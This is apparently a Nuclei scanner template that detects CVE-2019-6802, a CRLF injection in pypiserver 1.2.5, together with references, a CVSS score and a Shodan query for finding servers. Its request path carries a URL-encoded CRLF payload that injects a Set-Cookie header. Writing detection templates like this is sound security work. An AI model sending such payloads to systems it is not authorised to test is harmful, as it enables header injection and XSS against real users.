id: CVE-2019-6802 info: name: Pypiserver 1.2.5 - CRLF Injection author: 0x_Akoko severity: medium description: | CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI reference: - https://vuldb.com/?id.130257 - https://nvd.nist.gov/vuln/detail/CVE-2019-6802 - https://github.com/pypiserver/pypiserver/issues/237 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-6802 cwe-id: CWE-79,CWE-74 metadata: shodan-query: html:"pypiserver" verified: "true" tags: cve,cve2019,crlf,generic,pypiserver requests: - method: GET path: - "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;" matchers: - type: word part: header words: - 'Set-Cookie: crlfinjection=1;'